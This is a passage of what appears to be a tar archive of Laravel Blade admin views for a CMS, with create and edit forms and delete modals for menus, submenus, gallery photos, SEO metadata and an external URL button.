}}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger mr-1" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> </div> </div> </div> <!-- end row --> @endsection ������������������views/admin/menu/menu/create.blade.php��������������������������������������������������������������0000644�����������������00000032072�14765366573�0013755 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <div class="row"> <div class="col-12 box-margin"> <div class="card"> <div class="card-body"> <div class="d-flex justify-content-between align-items-center mb-20"> <h6 class="card-title mb-0">{{ __('content.menus') }}</h6> <div> <button type="button" class="btn btn-primary float-right mb-3" data-toggle="modal" data-target="#menuModal">+ {{ __('content.add_menu_name') }}</button> </div> </div> @if (count($menus) > 0) <div> <input id="check_all" type="checkbox" onclick="showHideDeleteButton(this)"> <label for="check_all">{{ __('content.all') }}</label> <a id="deleteChecked" class="ml-2" href="#" data-toggle="modal" data-target="#deleteCheckedModal"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form onsubmit="return btnCheckListGet()" action="{{ route('menu.destroy_checked') }}" method="POST"> @method('DELETE') @csrf @endif <input type="hidden" id="checked_lists" name="checked_lists" value=""> <!-- Modal --> <div class="modal fade" id="deleteCheckedModal" tabindex="-1" role="dialog" aria-labelledby="deleteCheckedModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="deleteCheckedModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.delete_selected') }} </div> <div class="modal-footer"> <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button onclick="btnCheckListGet()" type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </div> </div> </div> </div> </form> <table id="basic-datatable" class="table table-striped dt-responsive nowrap w-100"> <thead> <tr> <th scope="col">#</th> <th>{{ __('content.menu_name') }}</th> <th>{{ __('content.view') }}</th> <th>{{ __('content.status') }}</th> <th>{{ __('content.order') }}</th> <th class="custom-width-action">{{ __('content.action') }}</th> </tr> </thead> <tbody> @php $desc = count($menus); $asc=0; @endphp @foreach ($menus as $menu) <tr> <td> <input name="check_list[]" type="checkbox" value="{{ $menu->id }}" onclick="showHideDeleteButton2(this)"> <span class="d-none">{{ $asc++ }}{{ $desc-- }}</span> </td> <td>{{ $menu->menu_name }}</td> <td>{{ $menu->view }}</td> <td> @if($menu->status == 'draft') <span class="badge badge-danger">{{ __('content.draft') }}</span> @else <span class="badge badge-success">{{ __('content.published') }}</span> @endif </td> <td>{{ $menu->order }}</td> <td> <div> <a href="{{ route('menu.edit', $menu->id) }}" class="mr-2"> <i class="fa fa-edit text-info font-18"></i> </a> <a href="#" data-toggle="modal" data-target="#deleteModel{{ $menu->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> </td> </tr> <!-- Modal --> <div class="modal fade" id="deleteModel{{ $menu->id }}" tabindex="-1" role="dialog" aria-labelledby="exampleModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="exampleModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form class="d-inline-block" action="{{ route('menu.destroy', $menu->id) }}" method="POST"> @method('DELETE') @csrf @endif <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @endforeach </tbody> </table> @else <span>{{ __('content.not_yet_created') }}</span> @endif </div> <!-- end card body--> </div> <!-- end card --> </div><!-- end col--> </div><!-- end row--> <div class="modal fade" id="menuModal" tabindex="-1" role="dialog" aria-labelledby="menuModalLabel" aria-modal="false"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title mt-0 font-16" id="menuModalLabel">{{ __('content.add_new') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> </div> <div class="modal-body"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('menu.store') }}" method="POST"> @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="menu_name">{{ __('content.menu_name') }} <span class="text-red">*</span></label> <input type="text" name="menu_name" class="form-control" id="menu_name" required> </div> </div> <div class="col-md-12"> <div class="form-group form-group-default"> <label for="uri">{{ __('content.pages_within_the_site') }} </label> <select class="form-control" name="uri" id="uri"> <option value="">{{ __('content.empty') }}</option> @foreach ($pages as $page) @if ($page->page_name != 'blog-search-index') <option value="{{$page->page_uri}}">{{$page->page_uri}}</option> @endif @endforeach </select> <small class="form-text text-muted">{{ __('content.to_use_the_url_enter_empty_in_this_field') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="url">{{ __('content.url') }}</label> <input type="text" name="url" class="form-control" id="url"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="0"> </div> </div> <div class="col-xl-12"> <div class="form-group"> <label for="status" class="col-form-label">{{ __('content.status') }} </label> <select class="form-control" name="status" id="status"> <option value="published" selected>{{ __('content.select_your_option') }}</option> <option value="published">{{ __('content.published') }}</option> <option value="draft">{{ __('content.draft') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <small class="form-text text-muted">{{ __('content.required_fields') }}</small> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary">{{ __('content.submit') }}</button> </form> </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> @endsection ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/menu/menu/edit.blade.php����������������������������������������������������������������0000644�����������������00000011361�14765366573�0013435 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h4 class="card-title">{{ __('content.edit_menu_name') }}</h4> <div> <a href="{{ url()->previous() }}" class="btn btn-primary"><i class="fas fa-angle-left"></i> {{ __('content.back') }}</a> </div> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('menu.update', $menu->id) }}" method="POST"> @method('PUT') @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="menu_name">{{ __('content.menu_name') }} <span class="text-red">*</span></label> <input type="text" name="menu_name" class="form-control" id="menu_name" value="{{ $menu->menu_name }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="uri" class="col-form-label">{{ __('content.pages_within_the_site') }} </label> <select class="form-control" name="uri" id="uri"> <option value="">{{ __('content.empty') }}</option> @foreach ($pages as $page) @if ($page->page_name != 'blog-search-index') <option value="{{ $page->page_uri}}" {{ $page->page_uri == $menu->uri ? 'selected' : '' }}>{{ $page->page_uri }}</option> @endif @endforeach </select> <small class="form-text text-muted">{{ __('content.to_use_the_url_enter_empty_in_this_field') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="url">{{ __('content.url') }}</label> <input type="text" name="url" class="form-control" id="url" value="{{ $menu->url }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="{{ $menu->order }}" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="status" class="col-form-label">{{ __('content.status') }}</label> <select class="form-control" name="status" id="status"> <option value="published" selected>{{ __('content.select_your_option') }}</option> <option value="published" {{ $menu->status == "published" ? 'selected' : '' }}>{{ __('content.published') }}</option> <option value="draft" {{ $menu->status == "draft" ? 'selected' : '' }}>{{ __('content.draft') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <small class="form-text text-muted">{{ __('content.required_fields') }}</small> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> </div> </div> </div> <!-- end row --> @endsection �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/menu/submenu/create.blade.php�����������������������������������������������������������0000644�����������������00000034762�14765366573�0014477 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <div class="row"> <div class="col-12 box-margin"> <div class="card"> <div class="card-body"> <div class="d-flex justify-content-between align-items-center mb-20"> <h6 class="card-title mb-0">{{ __('content.submenus') }}</h6> <div> <button type="button" class="btn btn-primary float-right mb-3" data-toggle="modal" data-target="#submenuModal">+ {{ __('content.add_submenu') }}</button> </div> </div> @if (count($submenus) > 0) <div> <input id="check_all" type="checkbox" onclick="showHideDeleteButton(this)"> <label for="check_all">{{ __('content.all') }}</label> <a id="deleteChecked" class="ml-2" href="#" data-toggle="modal" data-target="#deleteCheckedModal"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form onsubmit="return btnCheckListGet()" action="{{ route('submenu.destroy_checked') }}" method="POST"> @method('DELETE') @csrf @endif <input type="hidden" id="checked_lists" name="checked_lists" value=""> <!-- Modal --> <div class="modal fade" id="deleteCheckedModal" tabindex="-1" role="dialog" aria-labelledby="deleteCheckedModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="deleteCheckedModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.delete_selected') }} </div> <div class="modal-footer"> <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button onclick="btnCheckListGet()" type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </div> </div> </div> </div> </form> <table id="basic-datatable" class="table table-striped dt-responsive nowrap w-100"> <thead> <tr> <th scope="col">#</th> <th>{{ __('content.submenu_name') }}</th> <th>{{ __('content.menu') }}</th> <th>{{ __('content.uri') }}</th> <th>{{ __('content.url') }}</th> <th>{{ __('content.view') }}</th> <th>{{ __('content.status') }}</th> <th>{{ __('content.order') }}</th> <th class="custom-width-action">{{ __('content.action') }}</th> </tr> </thead> <tbody> @php $desc = count($submenus); $asc=0; @endphp @foreach ($submenus as $submenu) <tr> <td> <input name="check_list[]" type="checkbox" value="{{ $submenu->id }}" onclick="showHideDeleteButton2(this)"> <span class="d-none">{{ $asc++ }}{{ $desc-- }}</span> </td> <td>{{ $submenu->submenu_name }}</td> <td><span class="badge badge-pill badge-dark">@if (isset($submenu->menu->menu_name)) {{ $submenu->menu->menu_name }} @else {{ $submenu->menu_name }} @endif</span></td> <td>{{ $submenu->uri }}</td> <td>{{ $submenu->url }}</td> <td>{{ $submenu->view }}</td> <td> @if ($submenu->status == "published") <span class="badge badge-pill badge-success">{{ __('content.published') }}</span> @else <span class="badge badge-pill badge-danger">{{ __('content.draft') }}</span> @endif </td> <td>{{ $submenu->order }}</td> <td> <div> <a href="{{ route('submenu.edit', $submenu->id) }}" class="mr-2"> <i class="fa fa-edit text-info font-18"></i> </a> <a href="#" data-toggle="modal" data-target="#deleteModel{{ $submenu->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> </td> </tr> <!-- Modal --> <div class="modal fade" id="deleteModel{{ $submenu->id }}" tabindex="-1" role="dialog" aria-labelledby="exampleModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="exampleModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form class="d-inline-block" action="{{ route('submenu.destroy', $submenu->id) }}" method="POST"> @method('DELETE') @csrf @endif <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @endforeach </tbody> </table> @else <span>{{ __('content.not_yet_created') }}</span> @endif </div> <!-- end card body--> </div> <!-- end card --> </div><!-- end col--> </div><!-- end row--> <div class="modal fade" id="submenuModal" tabindex="-1" role="dialog" aria-labelledby="submenuModalLabel" aria-modal="false"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title mt-0 font-16" id="submenuModalLabel">{{ __('content.add_new') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> </div> <div class="modal-body"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('submenu.store') }}" method="POST"> @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group form-group-default"> <label for="menu">{{ __('content.menus') }} <span class="text-red">*</span></label> <select class="form-control" name="menu_id" id="menu" required> @foreach($menus as $menu) <option value="{{$menu->id}}">{{$menu->menu_name}}</option> @endforeach </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="submenu_name">{{ __('content.submenu_name') }} <span class="text-red">*</span></label> <input type="text" name="submenu_name" class="form-control" id="submenu_name" required> </div> </div> <div class="col-md-12"> <div class="form-group form-group-default"> <label for="uri">{{ __('content.pages_within_the_site') }} </label> <select class="form-control" name="uri" id="uri"> <option value="">{{ __('content.empty') }}</option> @foreach ($pages as $page) @if ($page->page_name != 'blog-search-index') <option value="{{$page->page_uri}}">{{$page->page_uri}}</option> @endif @endforeach </select> <small class="form-text text-muted">{{ __('content.to_use_the_url_enter_empty_in_this_field') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="url">{{ __('content.url') }}</label> <input type="text" name="url" class="form-control" id="url"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="0"> </div> </div> <div class="col-xl-12"> <div class="form-group"> <label for="status" class="col-form-label">{{ __('content.status') }} </label> <select class="form-control" name="status" id="status"> <option value="published" selected>{{ __('content.select_your_option') }}</option> <option value="published">{{ __('content.published') }}</option> <option value="draft">{{ __('content.draft') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <small class="form-text text-muted">{{ __('content.required_fields') }}</small> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary">{{ __('content.submit') }}</button> </form> </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> @endsection ��������������views/admin/menu/submenu/edit.blade.php�������������������������������������������������������������0000644�����������������00000012777�14765366573�0014163 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h4 class="card-title">{{ __('content.edit_submenu') }}</h4> <div> <a href="{{ url()->previous() }}" class="btn btn-primary"><i class="fas fa-angle-left"></i> {{ __('content.back') }}</a> </div> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('submenu.update', $submenu->id) }}" method="POST"> @method('PUT') @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="menu" class="col-form-label">{{ __('content.menus') }} <span class="text-red">*</span></label> <select class="form-control" name="menu_id" id="menu" required> @foreach ($menus as $menu) <option value="{{ $menu->id}}" {{ $menu->id == $submenu->menu_id ? 'selected' : '' }}>{{ $menu->menu_name }}</option> @endforeach </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="submenu_name">{{ __('content.submenu_name') }} <span class="text-red">*</span></label> <input type="text" name="submenu_name" class="form-control" id="submenu_name" value="{{ $submenu->submenu_name }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="uri" class="col-form-label">{{ __('content.pages_within_the_site') }} </label> <select class="form-control" name="uri" id="uri"> <option value="">{{ __('content.empty') }}</option> @foreach ($pages as $page) @if ($page->page_name != 'blog-search-index') <option value="{{ $page->page_uri}}" {{ $page->page_uri == $submenu->uri ? 'selected' : '' }}>{{ $page->page_uri }}</option> @endif @endforeach </select> <small class="form-text text-muted">{{ __('content.to_use_the_url_enter_empty_in_this_field') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="url">{{ __('content.url') }}</label> <input type="text" name="url" class="form-control" id="url" value="{{ $submenu->url }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="{{ $submenu->order }}" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="status" class="col-form-label">{{ __('content.status') }}</label> <select class="form-control" name="status" id="status"> <option value="published" selected>{{ __('content.select_your_option') }}</option> <option value="published" {{ $submenu->status == "published" ? 'selected' : '' }}>{{ __('content.published') }}</option> <option value="draft" {{ $submenu->status == "draft" ? 'selected' : '' }}>{{ __('content.draft') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <small class="form-text text-muted">{{ __('content.required_fields') }}</small> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> </div> </div> </div> <!-- end row --> @endsection �views/admin/photo/create.blade.php������������������������������������������������������������������0000644�����������������00000015634�14765366573�0013203 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card"> <div class="card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h6 class="card-title mb-0">{{ __('content.add_photo') }}</h6> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('photo.store') }}" method="POST" enctype="multipart/form-data"> @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="gallery_image">{{ __('content.image') }} (.svg, .jpg, .jpeg, .png, .webp, gif) <span class="text-red">*</span></label> <input type="file" name="gallery_image" class="form-control-file" id="gallery_image" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="0" required> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> </div> </div> </div> </div> <!-- end row --> <!-- Sliders row --> @if (count($galleries) > 0) <div class="row"> <div class="col-12 box-margin"> <div class="card"> <div class="card-body"> <h5 class="card-title">{{ __('content.photos') }}</h5> <div class="row text-center"> @foreach ($galleries as $gallery) <div class="col-sm-6 col-xl-3 mb-4"> <a href="{{ asset('uploads/img/photo/'.$gallery->gallery_image) }}" data-lightbox="example-set"> <img src="{{ asset('uploads/img/photo/'.$gallery->gallery_image) }}" class="img-fluid mb-30" alt="gallery image"> </a> <div> <div> <div class="form-group"> <input type="text" value="{{ url('/'.'uploads/img/photo/'.$gallery->gallery_image) }}" id="copyImageLink{{ $gallery->id }}"> <button class="btn btn-success mt-3" onclick="copyImageLink({{ $gallery->id }})">{{ __('Copy Image Link') }}</button> </div> </div> <a href="{{ route('photo.edit', $gallery->id) }}" class="mr-2"> <i class="fa fa-edit text-info font-18"></i> </a> <a href="#" data-toggle="modal" data-target="#deleteModel{{ $gallery->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> <!-- Modal --> <div class="modal fade" id="deleteModel{{ $gallery->id }}" tabindex="-1" role="dialog"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="exampleModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form class="d-inline-block" action="{{ route('photo.destroy', $gallery->id) }}" method="POST"> @csrf @method('DELETE') @endif <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> </div> </div> @endforeach </div> </div> </div> </div> </div> <div class="row"> <div class="col-md-12"> {{ $galleries->links() }} </div> </div> @endif <!-- end row --> @endsection ����������������������������������������������������������������������������������������������������views/admin/photo/edit.blade.php��������������������������������������������������������������������0000644�����������������00000005746�14765366573�0012670 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <h4 class="card-title">{{ __('content.edit_photo') }}</h4> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('photo.update', $gallery->id) }}" method="POST" enctype="multipart/form-data"> @method('PUT') @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="gallery_image">{{ __('content.image') }} (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input type="file" name="gallery_image" class="form-control-file" id="gallery_image"> </div> <div class="height-card box-margin"> <div class="card"> <div class="card-body"> <div class="avatar-area text-center"> <div class="media"> <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> <img src="{{ asset('uploads/img/photo/'.$gallery->gallery_image) }}" alt="gallery image" class="rounded w-25"> </a> </div> </div> <!--end card-body--> </div> </div> <!--end card--> </div> <!--end col--> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="{{ $gallery->order }}" required> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> </div> </div> </div> <!-- end row --> @endsection ��������������������������views/admin/setting/seo/create.blade.php������������������������������������������������������������0000644�����������������00000017266�14765366573�0014320 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <h4 class="card-title">{{ __('content.seo') }}</h4> @if (isset($seo)) @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('seo.update', $seo->id) }}" method="POST"> @method('PUT') @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="meta_title">{{ __('content.meta_title') }} </label> <input type="text" name="meta_title" class="form-control" id="meta_title" value="{{ $seo->meta_title }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="meta_description">{{ __('content.meta_description') }} </label> <textarea name="meta_description" class="form-control" id="meta_description" rows="3">{{ $seo->meta_description }}</textarea> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="meta_keyword">{{ __('content.meta_keyword') }} ({{ __('content.separate_with_commas') }})</label> <textarea name="meta_keyword" class="form-control" id="meta_keyword" rows="3">{{ $seo->meta_keyword }}</textarea> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="fb_app_id" data-toggle="tooltip" title="{{ __('In order to use Facebook Insights you must add the app ID to your page. Insights lets you view analytics for traffic to your site from Facebook. Find the app ID in your App Dashboard.') }}">fb_app_id</label> <input type="text" name="fb_app_id" class="form-control" id="fb_app_id" value="{{ $seo->fb_app_id }}"> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> <a href="#" class="btn btn-primary" data-toggle="modal" data-target="#seoDestroyModal{{ $seo->id }}"> <i class="fa fa-trash"></i> {{ __('content.reset') }} </a> </div> </div> </form> <!-- Modal --> <div class="modal fade" id="seoDestroyModal{{ $seo->id }}" tabindex="-1" role="dialog" aria-labelledby="seoDestroyModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="seoDestroyModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('seo.destroy', $seo->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger mr-1" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @else @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('seo.store') }}" method="POST"> @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="meta_title">{{ __('content.meta_title') }}</label> <input type="text" name="meta_title" class="form-control" id="meta_title"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="meta_description">{{ __('content.meta_description') }}</label> <textarea name="meta_description" class="form-control" id="meta_description" rows="3"></textarea> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="meta_keyword">{{ __('content.meta_keyword') }} ({{ __('content.separate_with_commas') }})</label> <textarea name="meta_keyword" class="form-control" id="meta_keyword" rows="3"></textarea> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="fb_app_id" data-toggle="tooltip" title="{{ __('In order to use Facebook Insights you must add the app ID to your page. Insights lets you view analytics for traffic to your site from Facebook. Find the app ID in your App Dashboard.') }}">fb_app_id</label> <input type="text" name="fb_app_id" class="form-control" id="fb_app_id"> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> @endif </div> </div> </div> <!-- end row --> @endsection ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/setting/external_url/create.blade.php���������������������������������������������������0000644�����������������00000013330�14765366573�0016222 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Include Alert Blade --> @include('admin.alert.alert') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <h4 class="card-title">{{ __('content.external_url') }}</h4> @if (isset($external_url)) @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('external-url.update', $external_url->id) }}" method="POST"> @method('PUT') @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="button_name">{{ __('content.button_name') }}</label> <input type="text" name="button_name" class="form-control" id="button_name" value="{{ $external_url->button_name }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_url">{{ __('content.button_url') }}</label> <input type="text" name="button_url" class="form-control" id="button_url" value="{{ $external_url->button_url }}"> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> <a href="#" class="btn btn-primary" data-toggle="modal" data-target="#externalUrlDestroyModal{{ $external_url->id }}"> <i class="fa fa-trash"></i> {{ __('content.reset') }} </a> </div> </div> </form> <!-- Modal --> <div class="modal fade" id="externalUrlDestroyModal{{ $external_url->id }}" tabindex="-1" role="dialog" aria-labelledby="externalUrlDestroyModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="externalUrlDestroyModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('external-url.destroy', $external_url->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger mr-1" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> 